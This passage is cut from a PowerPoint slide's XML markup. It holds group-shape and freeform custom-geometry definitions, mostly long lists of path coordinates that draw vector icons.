                    <a:pt x="1596" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="396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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="104" name="Group 103"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-18431" y="6295336"/>
              <a:ext cx="2629525" cy="2582541"/>
              <a:chOff x="-76702" y="1304314"/>
              <a:chExt cx="2629525" cy="2582541"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="136" name="Freeform 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-76702" y="1304314"/>
                <a:ext cx="2629525" cy="2200406"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2194 w 7403"/>
                  <a:gd name="T1" fmla="*/ 0 h 6195"/>
                  <a:gd name="T2" fmla="*/ 2162 w 7403"/>
                  <a:gd name="T3" fmla="*/ 215 h 6195"/>
                  <a:gd name="T4" fmla="*/ 2121 w 7403"/>
                  <a:gd name="T5" fmla="*/ 425 h 6195"/>
                  <a:gd name="T6" fmla="*/ 2052 w 7403"/>
                  <a:gd name="T7" fmla="*/ 629 h 6195"/>
                  <a:gd name="T8" fmla="*/ 1974 w 7403"/>
                  <a:gd name="T9" fmla="*/ 819 h 6195"/>
                  <a:gd name="T10" fmla="*/ 1874 w 7403"/>
                  <a:gd name="T11" fmla="*/ 1008 h 6195"/>
                  <a:gd name="T12" fmla="*/ 1764 w 7403"/>
                  <a:gd name="T13" fmla="*/ 1181 h 6195"/>
                  <a:gd name="T14" fmla="*/ 1637 w 7403"/>
                  <a:gd name="T15" fmla="*/ 1343 h 6195"/>
                  <a:gd name="T16" fmla="*/ 1496 w 7403"/>
                  <a:gd name="T17" fmla="*/ 1496 h 6195"/>
                  <a:gd name="T18" fmla="*/ 1343 w 7403"/>
                  <a:gd name="T19" fmla="*/ 1637 h 6195"/>
                  <a:gd name="T20" fmla="*/ 1181 w 7403"/>
                  <a:gd name="T21" fmla="*/ 1764 h 6195"/>
                  <a:gd name="T22" fmla="*/ 1008 w 7403"/>
                  <a:gd name="T23" fmla="*/ 1874 h 6195"/>
                  <a:gd name="T24" fmla="*/ 819 w 7403"/>
                  <a:gd name="T25" fmla="*/ 1974 h 6195"/>
                  <a:gd name="T26" fmla="*/ 629 w 7403"/>
                  <a:gd name="T27" fmla="*/ 2052 h 6195"/>
                  <a:gd name="T28" fmla="*/ 425 w 7403"/>
                  <a:gd name="T29" fmla="*/ 2121 h 6195"/>
                  <a:gd name="T30" fmla="*/ 215 w 7403"/>
                  <a:gd name="T31" fmla="*/ 2162 h 6195"/>
                  <a:gd name="T32" fmla="*/ 0 w 7403"/>
                  <a:gd name="T33" fmla="*/ 2194 h 6195"/>
                  <a:gd name="T34" fmla="*/ 0 w 7403"/>
                  <a:gd name="T35" fmla="*/ 6194 h 6195"/>
                  <a:gd name="T36" fmla="*/ 551 w 7403"/>
                  <a:gd name="T37" fmla="*/ 6158 h 6195"/>
                  <a:gd name="T38" fmla="*/ 1086 w 7403"/>
                  <a:gd name="T39" fmla="*/ 6069 h 6195"/>
                  <a:gd name="T40" fmla="*/ 1606 w 7403"/>
                  <a:gd name="T41" fmla="*/ 5943 h 6195"/>
                  <a:gd name="T42" fmla="*/ 2110 w 7403"/>
                  <a:gd name="T43" fmla="*/ 5769 h 6195"/>
                  <a:gd name="T44" fmla="*/ 2593 w 7403"/>
                  <a:gd name="T45" fmla="*/ 5559 h 6195"/>
                  <a:gd name="T46" fmla="*/ 3050 w 7403"/>
                  <a:gd name="T47" fmla="*/ 5312 h 6195"/>
                  <a:gd name="T48" fmla="*/ 3491 w 7403"/>
                  <a:gd name="T49" fmla="*/ 5029 h 6195"/>
                  <a:gd name="T50" fmla="*/ 3900 w 7403"/>
                  <a:gd name="T51" fmla="*/ 4714 h 6195"/>
                  <a:gd name="T52" fmla="*/ 4289 w 7403"/>
                  <a:gd name="T53" fmla="*/ 4367 h 6195"/>
                  <a:gd name="T54" fmla="*/ 4640 w 7403"/>
                  <a:gd name="T55" fmla="*/ 3989 h 6195"/>
                  <a:gd name="T56" fmla="*/ 4966 w 7403"/>
                  <a:gd name="T57" fmla="*/ 3580 h 6195"/>
                  <a:gd name="T58" fmla="*/ 5255 w 7403"/>
                  <a:gd name="T59" fmla="*/ 3150 h 6195"/>
                  <a:gd name="T60" fmla="*/ 5512 w 7403"/>
                  <a:gd name="T61" fmla="*/ 2693 h 6195"/>
                  <a:gd name="T62" fmla="*/ 5732 w 7403"/>
                  <a:gd name="T63" fmla="*/ 2215 h 6195"/>
                  <a:gd name="T64" fmla="*/ 5911 w 7403"/>
                  <a:gd name="T65" fmla="*/ 1716 h 6195"/>
                  <a:gd name="T66" fmla="*/ 6047 w 7403"/>
                  <a:gd name="T67" fmla="*/ 1202 h 6195"/>
                  <a:gd name="T68" fmla="*/ 7402 w 7403"/>
                  <a:gd name="T69" fmla="*/ 0 h 6195"/>
                  <a:gd name="T70" fmla="*/ 3969 w 7403"/>
                  <a:gd name="T71" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T72" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T73" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T74" fmla="*/ 3370 w 7403"/>
                  <a:gd name="T75" fmla="*/ 3338 h 6195"/>
                  <a:gd name="T76" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T77" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T78" fmla="*/ 2766 w 7403"/>
                  <a:gd name="T79" fmla="*/ 3338 h 6195"/>
                  <a:gd name="T80" fmla="*/ 2467 w 7403"/>
                  <a:gd name="T81" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T82" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T83" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T84" fmla="*/ 1868 w 7403"/>
                  <a:gd name="T85" fmla="*/ 1837 h 6195"/>
                  <a:gd name="T86" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T87" fmla="*/ 1537 h 6195"/>
                  <a:gd name="T88" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T89" fmla="*/ 1837 h 6195"/>
                  <a:gd name="T90" fmla="*/ 3969 w 7403"/>
                  <a:gd name="T91" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T92" fmla="*/ 6499 w 7403"/>
                  <a:gd name="T93" fmla="*/ 598 h 6195"/>
                  <a:gd name="T94" fmla="*/ 7202 w 7403"/>
                  <a:gd name="T95" fmla="*/ 1002 h 6195"/>
                  <a:gd name="T96" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T97" fmla="*/ 2435 h 6195"/>
                  <a:gd name="T98" fmla="*/ 2766 w 7403"/>
                  <a:gd name="T99" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T100" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T101" fmla="*/ 2435 h 6195"/>
                  <a:gd name="T102" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T103" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T104" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T105" fmla="*/ 2435 h 6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7403" h="6195">
                    <a:moveTo>
                      <a:pt x="2194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2178" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2162" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2141" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2121" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2089" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2052" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2015" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1974" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1926" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1874" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1821" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1764" y="1181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1701" y="1265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1637" y="1343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1569" y="1422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="1496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="1569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="1637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1096" y="1821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="1874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="1926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="1974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="2015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="2052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="2089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="2121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="2141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="2162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="2178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="6184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="6158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="6121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1086" y="6069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="6011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="5943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1858" y="5864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2110" y="5769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2352" y="5669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2593" y="5559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2824" y="5444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3050" y="5312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3275" y="5176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3491" y="5029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3701" y="4877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3900" y="4714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4100" y="4546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4289" y="4367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4467" y="4179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4640" y="3989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4808" y="3785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4966" y="3580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5113" y="3370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5255" y="3150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5391" y="2923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5512" y="2693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5628" y="2456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5732" y="2215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5827" y="1968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5911" y="1716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5985" y="1459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6047" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7402" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7402" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2194" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3969" y="3040"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3669" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3370" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3370" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1868" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1868" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3969" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3969" y="3040"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7202" y="1002"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6499" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7202" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7202" y="1002"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2766" y="2435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2168" y="2435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="2435"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3066" y="2435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="2435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="243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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="137" name="Group 136"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="164480" y="1944859"/>
                <a:ext cx="2297507" cy="1941996"/>
                <a:chOff x="5356225" y="4513263"/>
                <a:chExt cx="2328863" cy="1968500"/>
              </a:xfrm>
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="138" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5356225" y="6210300"/>
                  <a:ext cx="177800" cy="271463"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 225 w 494"/>
                    <a:gd name="T1" fmla="*/ 641 h 752"/>
                    <a:gd name="T2" fmla="*/ 283 w 494"/>
                    <a:gd name="T3" fmla="*/ 651 h 752"/>
                    <a:gd name="T4" fmla="*/ 325 w 494"/>
                    <a:gd name="T5" fmla="*/ 635 h 752"/>
                    <a:gd name="T6" fmla="*/ 346 w 494"/>
                    <a:gd name="T7" fmla="*/ 604 h 752"/>
                    <a:gd name="T8" fmla="*/ 352 w 494"/>
                    <a:gd name="T9" fmla="*/ 567 h 752"/>
                    <a:gd name="T10" fmla="*/ 346 w 494"/>
                    <a:gd name="T11" fmla="*/ 520 h 752"/>
                    <a:gd name="T12" fmla="*/ 325 w 494"/>
                    <a:gd name="T13" fmla="*/ 451 h 752"/>
                    <a:gd name="T14" fmla="*/ 299 w 494"/>
                    <a:gd name="T15" fmla="*/ 420 h 752"/>
                    <a:gd name="T16" fmla="*/ 257 w 494"/>
                    <a:gd name="T17" fmla="*/ 409 h 752"/>
                    <a:gd name="T18" fmla="*/ 168 w 494"/>
                    <a:gd name="T19" fmla="*/ 320 h 752"/>
                    <a:gd name="T20" fmla="*/ 236 w 494"/>
                    <a:gd name="T21" fmla="*/ 310 h 752"/>
                    <a:gd name="T22" fmla="*/ 262 w 494"/>
                    <a:gd name="T23" fmla="*/ 284 h 752"/>
                    <a:gd name="T24" fmla="*/ 278 w 494"/>
                    <a:gd name="T25" fmla="*/ 252 h 752"/>
                    <a:gd name="T26" fmla="*/ 278 w 494"/>
                    <a:gd name="T27" fmla="*/ 184 h 752"/>
                    <a:gd name="T28" fmla="*/ 262 w 494"/>
                    <a:gd name="T29" fmla="*/ 126 h 752"/>
                    <a:gd name="T30" fmla="*/ 242 w 494"/>
                    <a:gd name="T31" fmla="*/ 105 h 752"/>
                    <a:gd name="T32" fmla="*/ 194 w 494"/>
                    <a:gd name="T33" fmla="*/ 100 h 752"/>
                    <a:gd name="T34" fmla="*/ 157 w 494"/>
                    <a:gd name="T35" fmla="*/ 115 h 752"/>
                    <a:gd name="T36" fmla="*/ 136 w 494"/>
                    <a:gd name="T37" fmla="*/ 142 h 752"/>
                    <a:gd name="T38" fmla="*/ 131 w 494"/>
                    <a:gd name="T39" fmla="*/ 184 h 752"/>
                    <a:gd name="T40" fmla="*/ 5 w 494"/>
                    <a:gd name="T41" fmla="*/ 252 h 752"/>
                    <a:gd name="T42" fmla="*/ 10 w 494"/>
                    <a:gd name="T43" fmla="*/ 115 h 752"/>
                    <a:gd name="T44" fmla="*/ 58 w 494"/>
                    <a:gd name="T45" fmla="*/ 53 h 752"/>
                    <a:gd name="T46" fmla="*/ 183 w 494"/>
                    <a:gd name="T47" fmla="*/ 5 h 752"/>
                    <a:gd name="T48" fmla="*/ 272 w 494"/>
                    <a:gd name="T49" fmla="*/ 0 h 752"/>
                    <a:gd name="T50" fmla="*/ 346 w 494"/>
                    <a:gd name="T51" fmla="*/ 26 h 752"/>
                    <a:gd name="T52" fmla="*/ 409 w 494"/>
                    <a:gd name="T53" fmla="*/ 115 h 752"/>
                    <a:gd name="T54" fmla="*/ 425 w 494"/>
                    <a:gd name="T55" fmla="*/ 189 h 752"/>
                    <a:gd name="T56" fmla="*/ 409 w 494"/>
                    <a:gd name="T57" fmla="*/ 268 h 752"/>
                    <a:gd name="T58" fmla="*/ 378 w 494"/>
                    <a:gd name="T59" fmla="*/ 310 h 752"/>
                    <a:gd name="T60" fmla="*/ 336 w 494"/>
                    <a:gd name="T61" fmla="*/ 336 h 752"/>
                    <a:gd name="T62" fmla="*/ 399 w 494"/>
                    <a:gd name="T63" fmla="*/ 347 h 752"/>
                    <a:gd name="T64" fmla="*/ 446 w 494"/>
                    <a:gd name="T65" fmla="*/ 378 h 752"/>
                    <a:gd name="T66" fmla="*/ 483 w 494"/>
                    <a:gd name="T67" fmla="*/ 457 h 752"/>
                    <a:gd name="T68" fmla="*/ 493 w 494"/>
                    <a:gd name="T69" fmla="*/ 525 h 752"/>
                    <a:gd name="T70" fmla="*/ 488 w 494"/>
                    <a:gd name="T71" fmla="*/ 604 h 752"/>
                    <a:gd name="T72" fmla="*/ 441 w 494"/>
                    <a:gd name="T73" fmla="*/ 677 h 752"/>
                    <a:gd name="T74" fmla="*/ 383 w 494"/>
                    <a:gd name="T75" fmla="*/ 719 h 752"/>
                    <a:gd name="T76" fmla="*/ 283 w 494"/>
                    <a:gd name="T77" fmla="*/ 745 h 752"/>
                    <a:gd name="T78" fmla="*/ 152 w 494"/>
                    <a:gd name="T79" fmla="*/ 735 h 752"/>
                    <a:gd name="T80" fmla="*/ 89 w 494"/>
                    <a:gd name="T81" fmla="*/ 682 h 752"/>
                    <a:gd name="T82" fmla="*/ 42 w 494"/>
                    <a:gd name="T83" fmla="*/ 556 h 752"/>
                    <a:gd name="T84" fmla="*/ 178 w 494"/>
                    <a:gd name="T85" fmla="*/ 530 h 7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94" h="752">
                      <a:moveTo>
                        <a:pt x="215" y="625"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="215" y="625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="641"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="304" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="284"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="53"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
